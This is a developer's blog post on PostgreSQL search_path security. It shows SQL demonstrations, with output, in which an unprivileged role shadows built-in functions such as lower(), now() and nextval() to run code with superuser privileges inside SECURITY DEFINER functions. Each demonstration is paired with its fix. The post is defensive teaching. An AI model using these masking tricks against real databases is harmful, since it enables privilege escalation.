One habit that changed between 2007 (when I was still working with ActiveRecord) and now (with my most recent torture being by Django’s horrid ORM) is that I no longer rely on PostgreSQL its search_path for anything. Instead, I tend to use qualified names for pretty much anything. But, because one should never stop doubting ones own choices, recently I did some digging and testing to see if there really are no valid, safe use cases for the use of unqualified names in PostgreSQL…
-
In the postgresql.conf config file:
search_path = '"$user", public'
-
At the user/role level:
ALTER ROLE { role_specification | ALL } [ IN DATABASE database_name ] SET search_path { TO | = } { value | DEFAULT }
ALTER ROLE { role_specification | ALL } [ IN DATABASE database_name ] SET search_path FROM CURRENT
ALTER ROLE { role_specification | ALL } [ IN DATABASE database_name ] RESET search_path
-
At the database level:
ALTER DATABASE name SET search_path { TO | = } { value | DEFAULT };
ALTER DATABASE name SET search_path FROM CURRENT;
ALTER DATABASE name RESET search_path;
-
And at the routine level:
ALTER FUNCTION name [ ( [ [ argmode ] [ argname ] argtype [, ...] ] ) ]
SET search_path { TO | = } { value | DEFAULT };
ALTER FUNCTION name [ ( [ [ argmode ] [ argname ] argtype [, ...] ] ) ]
SET search_path FROM CURRENT;
ALTER FUNCTION name [ ( [ [ argmode ] [ argname ] argtype [, ...] ] ) ]
RESET search_path;
ALTER PROCEDURE name [ ( [ [ argmode ] [ argname ] argtype [, ...] ] ) ]
SET search_path { TO | = } { value | DEFAULT };
ALTER PROCEDURE name [ ( [ [ argmode ] [ argname ] argtype [, ...] ] ) ]
SET search_path FROM CURRENT;
ALTER PROCEDURE name [ ( [ [ argmode ] [ argname ] argtype [, ...] ] ) ]
RESET search_path;
Importantly, all these settings set defaults. They do not stop the user (or a VOLATILE function/procedure) from overriding that default by issuing:
SET search_path TO evil_schema, pg_catalog;
Or, if the user doesn’t have their own evil_schema:
select set_config('search_path', 'pg_temp, pg_catalog');
In the following example, SUPERUSER wortel innocuously uses lower() in a SECURITY DEFINER function, naively assuming that it’s implicitly referring to pg_catalog.lower():
CREATE ROLE wortel WITH SUPERUSER;
SET ROLE wortel;
CREATE SCHEMA myauth;
GRANT USAGE
ON SCHEMA myauth
TO PUBLIC;
CREATE FUNCTION myauth.validate_credentials(email$ text, password$ text)
RETURNS BOOLEAN
SECURITY DEFINER
LANGUAGE PLPGSQL
AS $$
DECLARE
normalized_email text;
BEGIN
normalized_email := lower(email$);
-- Something interesting happens here…
RETURN TRUE;
END;
$$;
GRANT EXECUTE
ON FUNCTION myauth.validate_credentials
TO PUBLIC;
wortel creates a new user piet and gives piet his own schema, assuming that he can only do damage to his own little garden:
CREATE ROLE piet;
CREATE SCHEMA AUTHORIZATION piet;
However, piet turns out to be wearing his black hat today:
SET ROLE piet;
SET search_path TO DEFAULT;
SELECT current_setting('search_path'), current_schemas(true);
SELECT myauth.validate_credentials('pietje@example.com', 'Piet zijn password');
CREATE FUNCTION piet.lower(text)
RETURNS TEXT
LANGUAGE plpgsql
AS $$
BEGIN
RAISE NOTICE 'I can now do nasty stuff as %!', current_user;
RETURN pg_catalog.lower($1);
END;
$$;
SET search_path TO piet, pg_catalog; -- Reverse order;
SELECT current_setting('search_path'), current_schemas(true);
SELECT myauth.validate_credentials('pietje@example.com', 'Piet zijn password');
SET
SET
current_setting | current_schemas
-----------------+-------------------
"$user", public | {pg_catalog,piet}
(1 row)
validate_credentials
----------------------
t
(1 row)
CREATE FUNCTION
SET
current_setting | current_schemas
------------------+-------------------
piet, pg_catalog | {piet,pg_catalog}
(1 row)
NOTICE: I can now do nasty stuff as superuser!
validate_credentials
----------------------
t
(1 row)
This can be mitigated by attaching a specific search_path to the SECURITY DEFINER routine:
RESET ROLE;
ALTER FUNCTION myauth.validate_credentials
SET search_path = pg_catalog;
SET ROLE piet;
SET search_path TO piet, pg_catalog; -- Reverse order;
SELECT current_setting('search_path'), current_schemas(true);
SELECT myauth.validate_credentials('pietje@example.com', 'Piet zijn password');
RESET
ALTER FUNCTION
SET
SET
current_setting | current_schemas
------------------+-------------------
piet, pg_catalog | {piet,pg_catalog}
(1 row)
validate_credentials
----------------------
t
(1 row)
Before the changes made in response to CVE-2007-2138, piet would have been able to mask pg_catalog.lower with his own pg_temp.lower() even if he did not muck around with the search_path. After all, by default, pg_temp is prepended to the very front of the effective search path:
CREATE ROLE wortel WITH SUPERUSER;
SET ROLE wortel;
CREATE SCHEMA myauth;
GRANT USAGE
ON SCHEMA myauth
TO PUBLIC;
CREATE FUNCTION myauth.validate_credentials(email$ text, password$ text)
RETURNS BOOLEAN
SECURITY DEFINER
LANGUAGE PLPGSQL
AS $$
DECLARE
normalized_email text;
BEGIN
normalized_email := lower(email$);
-- Something interesting happens here…
RAISE NOTICE 'My effective search path is: %', current_schemas(true);
RETURN true;
END;
$$;
GRANT EXECUTE
ON FUNCTION myauth.validate_credentials
TO PUBLIC;
DROP SCHEMA piet CASCADE;
DROP ROLE piet;
CREATE ROLE piet;
SET ROLE piet;
SET search_path TO DEFAULT;
SELECT current_setting('search_path'), current_schemas(true);
SELECT myauth.validate_credentials('pietje@example.com', 'Piet zijn password');
CREATE FUNCTION pg_temp.lower(text)
RETURNS TEXT
LANGUAGE plpgsql
AS $$
BEGIN
RAISE NOTICE 'I can now do nasty stuff as %!', current_user;
RETURN pg_catalog.lower($1);
END;
$$;
SELECT current_setting('search_path'), current_schemas(true);
SELECT myauth.validate_credentials('pietje@example.com', 'Piet zijn password');
RESET ROLE;
ALTER FUNCTION myauth.validate_credentials
SET search_path = pg_catalog;
SET ROLE piet;
SELECT current_setting('search_path'), current_schemas(true);
SELECT myauth.validate_credentials('pietje@example.com', 'Piet zijn password');
CREATE ROLE
SET
CREATE SCHEMA
GRANT
CREATE FUNCTION
GRANT
ERROR: schema "piet" does not exist
DROP ROLE
CREATE ROLE
SET
SET
current_setting | current_schemas
-----------------+-----------------
"$user", public | {pg_catalog}
(1 row)
NOTICE: My effective search path is: {pg_catalog,public}
validate_credentials
----------------------
t
(1 row)
CREATE FUNCTION
current_setting | current_schemas
-----------------+------------------------
"$user", public | {pg_temp_3,pg_catalog}
(1 row)
NOTICE: My effective search path is: {pg_temp_3,pg_catalog,public}
validate_credentials
----------------------
t
(1 row)
RESET
ALTER FUNCTION
SET
current_setting | current_schemas
-----------------+------------------------
"$user", public | {pg_temp_3,pg_catalog}
(1 row)
NOTICE: My effective search path is: {pg_temp_3,pg_catalog}
validate_credentials
----------------------
t
(1 row)
As you can see, now this approach doesn’t work anymore, even though the effective search path includes pg_temp_3 (logically so because it is omitted in the search_path that is SET on the routine level). That is because part of the fix for CVE-2007-2138 was that unqualified routine and function names are never searched for in the temporary schema name. (The other part of the fix was that pg_temp can be listed explicitly in the search_path to also give it lower precedence for relation names.)
Before PostgreSQL 15, there was another way in which piet would have been able to mask pg_catalog.lower(): by creating the function in public, which was, until Pg 15, fair game for all roles to CREATE FUNCTIONs in.
Pro tip: you can use CREATE { FUNCTION | ROUTINE } … SET search_path FROM CURRENT to take the search_path from the migration context.
When unqualified names in table column default value expressions are evaluated
So, now we know how to control the search_path of tables so that we don’t have to write out every operator within each function in a form like:
SELECT 3 OPERATOR(pg_catalog.+) 4;
How about the DEFAULT expressions for columns in table definitions? And, similarly, what about GENERATED ALWAYS AS expressions?
If a table is wrapped inside a view for security, can evil_user mask, for instance, the now() function with evil_user.now() and have evil_user.now() be executed as the view’s definer?
No:
“Functions called in the view are treated the same as if they had been called directly from the query using the view. Therefore, the user of a view must have permissions to call all functions used by the view. Functions in the view are executed with the privileges of the user executing the query or the function owner, depending on whether the functions are defined as SECURITY INVOKER or SECURITY DEFINER. Thus, for example, calling CURRENT_USER directly in a view will always return the invoking user, not the view owner. This is not affected by the view’s security_invoker setting, and so a view with security_invoker set to false is not equivalent to a SECURITY DEFINER function and those concepts should not be confused.”
But is the same true for when the table is wrapped by one of these MS Certified Suit-style wrapper functions? This would depend on when the unqualified object names are resolved into schema-qualified names—during table definition or during INSERT or UPDATE. So when does this happen? Well, that is a bit difficult to spot:
BEGIN TRANSACTION;
CREATE ROLE wortel WITH SUPERUSER;
SET ROLE wortel;
CREATE SCHEMA protected;
CREATE SEQUENCE protected.thingy_id_seq;
CREATE TABLE protected.thingy (
id BIGINT
PRIMARY KEY
DEFAULT nextval('protected.thingy_id_seq')
,id2 UUID
UNIQUE
DEFAULT gen_random_uuid()
,inserted_by_application NAME
DEFAULT current_setting('application_name')
,inserted_at TIMESTAMPTZ
DEFAULT now()
,description TEXT
);
SELECT pg_get_expr(adbin, 'protected.thingy'::regclass::oid)
FROM pg_catalog.pg_attrdef
WHERE adrelid = 'protected.thingy'::regclass::oid;
CREATE SCHEMA exposed;
CREATE FUNCTION exposed.insert_thingy(TEXT)
RETURNS BIGINT
SECURITY DEFINER
LANGUAGE PLPGSQL
AS $$
DECLARE
_new_id BIGINT;
BEGIN
RAISE NOTICE 'current_schemas(true) = %', current_schemas(true);
INSERT INTO protected.thingy (description)
VALUES ($1)
RETURNING id
INTO _new_id;
RETURN _new_id;
END;
$$;
CREATE ROLE evil_user;
CREATE SCHEMA AUTHORIZATION evil_user;
GRANT USAGE
ON SCHEMA exposed
TO evil_user;
GRANT EXECUTE
ON FUNCTION exposed.insert_thingy
TO evil_user;
SET ROLE evil_user;
CREATE FUNCTION evil_user.nextval(regclass)
RETURNS BIGINT
LANGUAGE PLPGSQL
AS $$
BEGIN
RAISE NOTICE 'I am now running as: %', current_user;
RETURN 666;
END;
$$;
CREATE FUNCTION evil_user.now()
RETURNS TIMESTAMPTZ
LANGUAGE PLPGSQL
AS $$
BEGIN
RAISE NOTICE 'I am now running as: %', current_user;
RETURN pg_catalog.now();
END;
$$;
SET search_path TO evil_user, pg_catalog; -- Reverse path
SELECT exposed.insert_thingy('This is a thing');
RESET ROLE;
SHOW search_path;
SELECT pg_get_expr(adbin, 'protected.thingy'::regclass::oid)
FROM pg_catalog.pg_attrdef
WHERE adrelid = 'protected.thingy'::regclass::oid;
BEGIN
CREATE ROLE
SET
CREATE SCHEMA
CREATE SEQUENCE
CREATE TABLE
pg_get_expr
----------------------------------------------
nextval('protected.thingy_id_seq'::regclass)
gen_random_uuid()
current_setting('application_name'::text)
now()
(4 rows)
CREATE SCHEMA
CREATE FUNCTION
CREATE ROLE
CREATE SCHEMA
GRANT
GRANT
SET
CREATE FUNCTION
CREATE FUNCTION
SET
NOTICE: current_schemas(true) = {evil_user,pg_catalog}
insert_thingy
---------------
1
(1 row)
RESET
search_path
-----------------------
evil_user, pg_catalog
(1 row)
pg_get_expr
---------------------------------------------------------
pg_catalog.nextval('protected.thingy_id_seq'::regclass)
gen_random_uuid()
current_setting('application_name'::text)
pg_catalog.now()
(4 rows)
As you can see, pg_get_expr() has only disambiguated the functions that evil_user has tried to mask. Conclusion: yes, schema-binding happens when the DDL (CREATE or ALTER TABLE) is executed.
No need to worry about security holes here, as long as you are aware of the search_path with which you are running your migrations. (You are using some sort of migration script, are you not? The only valid answer in the negative is if instead you’re managing your PostgreSQL schemas via extension upgrade scripts.)
Valid and less valid search_path use cases
Despite the deep-dive in all the caveats above, the search_path is not all bad. We can now be very precise about the context in which it’s reasonably safe to rely on the search_path:
-
within SECURITY INVOKER routines, because these are executed with the privileges of the caller (but see below for further caveats);
-
within SECURITY DEFINER routines for which SET search_path is explicitly specified;
-
within CREATE TABLE and CREATE VIEW DDL statements, as long as you are aware of the search_path at the time of creation, as the schema-binding will happen during creation.
Do note that even without escalated privileges, the unsuspected masking of a function by a malicious function could still result in, for instance, prices for a certain user always amounting to zero, or the random password reset string being not so random. Therefore, here are some context in which you should never rely on the search_path:
-
when there are schemas in the search_path which you do not trust 100%;
-
within SECURITY DEFINER routines for which SET search_path is not explicitly specified;
-
(trigger) routines that are supposed to produce something random (unless if these are protected by SET search_path;
That all sounds terribly complicated. That begs the question: are there, in fact, use cases which would justify us to not just blanket schema-qualify ever-y-thing?
Use case: brevity
If you consider that operators are schema-qualified objects too, you will most likely want to at least allow yourself and your team to forego the typing of 3 + 4 instead of 3 OPERATOR(pg_catalog.+) 4 in the body of your routines. Admittedly, this is not a very strong argument in favor of the search_path, but there is no harm in it as long as your define your routines with SET search_path.
Use case: polymorphism
When I define a poymorphic routine with anyelement, anyarray or anyanything pseudo-types in its signature, I want the routine to be able to apply functions and operators to its arguments regardless of whether these (overloaded) functions and operators already existed in a schema that I was aware of at the time of CREATE-ing the routine.
Suppose I have a polymorphic function called sum_price_lines(anyarray):
BEGIN TRANSACTION;
CREATE FUNCTION pricing.sum_price_lines(anyarray)
RETURNS anyelement
LANGUAGE plpgsql
AS $$
BEGIN
RETURN (
SELECT
SUM(net_price(line))
FROM
unnest($1) AS line
);
END;
$$;
CREATE FUNCTION pricing.net_price(int)
RETURNS int
LANGUAGE SQL
RETURN $1;
SET search_path TO pricing;
SELECT pricing.sum_price_lines('{1,2,3,4}'::int[])
sum_price_lines() calls net_price on each individual member of its anyarray argument. With the supplied function, this doesn’t do anything useful, but the creator of the invoicing schema can for instance use this to sum rows of the invoicing.invoice_line table type, simply by creating an overloaded invoicing.net_price(invoicing.invoice_line[]) function and making sure that it can be found in the search_path.
Use case: function and operator overloading
And indeed overloading (also of operators) is a very important use case of the search_path. Being able to define +, -, and * for anything, from order lines, to invoice lines, to quotation lines, and to users even is a valuable tool, that we wouldn’t want to be taken away from us entirely by a lacking understanding of search_path security.
Use case: overriding/masking objects in another schema
I got re-interested in relying on the search_path rather than on schema-qualified names while I was working on an extension to make mocking the pg_catalog.now() function (or other functions) easy and performant. Because table defaults are schema-bound during CREATE TABLE time, I couldn’t rely on the search_path to mask pg_catalog.now() with mockable.now(). Instead, I use mockable.now() directly, which, when the mocker is not active, is just a thin wrapper around pg_catalog.now(), which the query planner should be able to inline completely without trouble.
But there are other use cases in which schema masking can be very useful. For instance, if you want to offer a specific extension schema to your … extension. Maybe you want to offer a table with factory defaults and rather than have the user TRUNCATE the table (and make upgrades and comparisons to the factory-default data a headache), you allow them (or some function/producedure, possible triggered from a view) to create a table of their own. Let me know if you know or can come up with more good examples.
Some words of thanks
Thanks to the Postgres ecosystem
I wish to express my gratitude towards the ever-solid developers of PostgreSQL, who have kept improving PostgreSQL at a steady, sustainable pace in the 15 years since I last seriously used it in 2007. All the features that I wished were there in 2007 have since been implemented, including, very recently, in PostgreSQL, WITH (security_invoker) for views. A guilty pleasure from my last long-term stint at a wage slave working with Django’s ORM was to every now and then glare at the PostgreSQL feature matrix and fantasize about being able to really unleash this beast without being hindered by the lowest common denominator (MySQL) that ORMs tend to cater to.
And thanks to the excellent PostgREST, I can now do what I dreamt of for years. And yes, for years, I’ve dreamt precisely of using PostgREST rather than all the ridiculously inefficient, verbose, and mismatched layers around SQL that things like the django-rest-framework forced upon me. Indeed, as François-Guillaume Ribreau testified, “it feels like cheating!”
Thanks to friends
The motivation for deep-diving into PostgreSQL again, after quite a few years wherein the power of PostgreSQL was buffered by Django in my day job, came from an excellent MQTT broker written by my buddy Wiebe. Me and another friend—Jeroen—where so impressed by the speed and robustness of this MQTT server software that we decided to build a managed MQTT hosting business around it. And we’ve been building all this goodness around the FlashMQ FOSS core with a very solid PostgreSQL core, a PostgREST API and a Vue.JS/Nuxt front + back-end. Some daemons hover around the PostgreSQL core and connect directly to it (through dedicated schemas, to confirm to my Application-Exclusive Schema Scoping (AESS) practice), so that it all resembles a very light-weight micro-services architecture.
Further reading
Recent Comments